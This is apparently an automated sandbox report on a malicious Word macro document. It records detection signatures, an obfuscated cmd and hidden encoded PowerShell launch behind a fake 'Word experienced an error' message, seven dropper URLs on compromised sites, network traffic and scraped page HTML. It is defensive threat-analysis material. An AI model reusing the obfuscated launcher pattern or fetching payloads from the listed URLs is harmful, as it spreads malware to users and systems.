
Analysis Report Informacion_29.doc

Overview

General Information

Sample Name: Informacion_29.doc
Analysis ID: 336937
MD5: 6c1cb4c06ead6f5ce29a931fa12410fa
SHA1: 4ac228fa54e73993dcccb69389a97cfcf67228b5
SHA256: 43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3


Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2412 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2292 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2028 cmdline: POwersheLL -w hidden -ENCOD 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000005.00000002.2217570571.0000000001BA6000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly
Description: Detects obfuscated PowerShell hacktools
Author: Florian Roth
Strings:
  • 0x890:$s1: POwersheLL

Source: 00000005.00000002.2217397039.0000000000106000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly
Description: Detects obfuscated PowerShell hacktools
Author: Florian Roth
Strings:
  • 0x1f10:$s1: POwersheLL

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: POwersheLL -w hidden -ENCOD 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

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: Informacion_29.doc | Virustotal: Detection: 62%
Source: Informacion_29.doc | ReversingLabs: Detection: 79%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ??\C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219049704.00000000028F5000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb" source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdblog source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2219201518.0000000002B90000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: wheelcomoving.com
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 58.97.195.135:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 66.85.46.76:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp | String found in memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp | String found in memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp | String found in memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp | String found in memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp | String found in memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp | String found in memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp | String found in memory: https://phawayagency.com/wp-admin/mXo4b/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></ QUICK AND EASY LOW CARB">The Ketonian Cookbook &#8211; QUICK AND EASY LOW C
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/" rel="bookmark" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/" rel="bookmark" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-eating-daniela-diaries/" rel="bookmark" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-programme-free-all-access-pass/" rel="bookmark" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/keto-full-day-of-eating-keto-bakes-biscuits-keto-chow/" rel="bookmark" title="Keto Full Day of Eating | Keto Bakes Biscuits | Keto Chow"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-Chow-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-Chow-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-Chow-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Keto Full Day of Eating | Keto Bakes Biscuits | Keto Chow"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/" rel="bookmark" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></span></a></div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: <script type="application/ld+json" class="yoast-schema-graph">{"
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: context":"https://schema.org","
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: graph":[{"
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: type":"WebSite","
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: id":"https://stage.thebestfikrah.com/#website","url":"https://stage.thebestfikrah.com/","name":"The Best Fikrah","description":"Think Right. Lead Well.","potentialAction":[{"
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: type":"SearchAction","target":"https://stage.thebestfikrah.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}</script>
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: type":"SearchAction","target":"https://stage.thebestfikrah.com/?s={search_term_string}","query-input":"required name=search_term_st
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: <img width="6413" height="914" alt="" loading="lazy" data-srcset="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png 6413w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-300x43.png 300w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png 1024w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-770x110.png 770w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1536x219.png 1536w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-2048x292.png 2048w" data-src="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png" data-sizes="(max-width: 6413px) 100vw, 6413px" class="attachment-full size-full lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img width="6413" height="914" src="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png" class="attachment-full size-full" alt="" loading="lazy" srcset="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png 6413w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-300x43.png 300w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png 1024w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-770x110.png 770w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1536x219.png 1536w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-2048x292.png 2048w" sizes="(max-width: 6413px) 100vw, 6413px" /></noscript></div>
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: <div class="elementor-text-editor elementor-clearfix"><p><a href="https://thebestfikrah.com/about-us/">About us</a><br /><a href="https://thebestfikrah.com/foreword-founder/">Founder says</a><br /><a href="https://thebestfikrah.com/our-team/">Our team</a><br /><a href="https://thebestfikrah.com/terms-and-conditions/">Terms and conditions</a><br /><a href="https://thebestfikrah.com/privacy-policy/">Privacy Policy</a></p></div>
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: <div class="elementor-text-editor elementor-clearfix"><p><a href="https://www.facebook.com/groups/thebestfikrah">Join us</a><br /><a href="https://thebestfikrah.com/contribute-your-writing/">Contribute</a><br /><a href="https://thebestfikrah.com/contact-us/">Contact us</a><br /><a href="https://thebestfikrah.com/sitemap_index.xml">Site Map</a></p></div>
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div>
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in memory: <li id="menu-item-1598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-1598"><a title="" href="https://wheelcomoving.com/">Home</a></li><li id="menu-item-2113" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2113"><a href="https://wheelcomoving.com/track-and-trace/">TRACK AND TRACE</a></li><li id="menu-item-1158" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
Source: global traffic | HTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1 | Host: wheelcomoving.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1 | Host: ketoresetme.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-admin/fOIlVX/ HTTP/1.1 | Host: thebestfikrah.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 66.85.46.76
Source: Joe Sandbox View | IP Address: 70.32.23.58
Source: Joe Sandbox View | ASN Name: HOST4GEEKS-LLCUS
Source: Joe Sandbox View | ASN Name: SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY
Source: Joe Sandbox View | ASN Name: GOOGLE-2US
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABB8037-B28F-4AE5-86AD-026C320EA73C}.tmp
Source: global traffic | HTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1 | Host: wheelcomoving.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1 | Host: ketoresetme.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-admin/fOIlVX/ HTTP/1.1 | Host: thebestfikrah.com | Connection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.twitter.com (Twitter)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <div class="elementor-text-editor elementor-clearfix"><p><a href="https://www.facebook.com/groups/thebestfikrah">Join us</a><br /><a href="https://thebestfikrah.com/contribute-your-writing/">Contribute</a><br /><a href="https://thebestfikrah.com/contact-us/">Contact us</a><br /><a href="https://thebestfikrah.com/sitemap_index.xml">Site Map</a></p></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <a class="elementor-icon" href="https://www.facebook.com/thebestfikrah/"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <a class="elementor-icon" href="https://www.youtube.com/channel/UCxY0oXl0BiKqF7iS16gHFhg"> equals www.youtube.com (Youtube)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/groups/thebestfikrah" class="elementor-button-link elementor-button elementor-size-xs elementor-animation-grow" role="button"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-103112"><a href="https://www.facebook.com/groups/thebestfikrah" class="elementor-item">Join us</a></li> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=218352666062597&ev=PageView&noscript=1" /> equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: wheelcomoving.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Jan 2021 10:47:06 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, Keep-Alive | Vary: Accept-Encoding | Keep-Alive: timeout=5, max=100 | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8 | Data Raw: 31 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 0d 0a | Data Ascii: 17<!DOCTYPE html><html
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://00zyku.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp | String found in binary or memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp | String found in binary or memory: http://fonts.googleapis.com/css?family=Lato:100
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://fonts.googleapis.com/css?family=Work
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://html5shim.googlecode.com/svn/trunk/html5.js
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
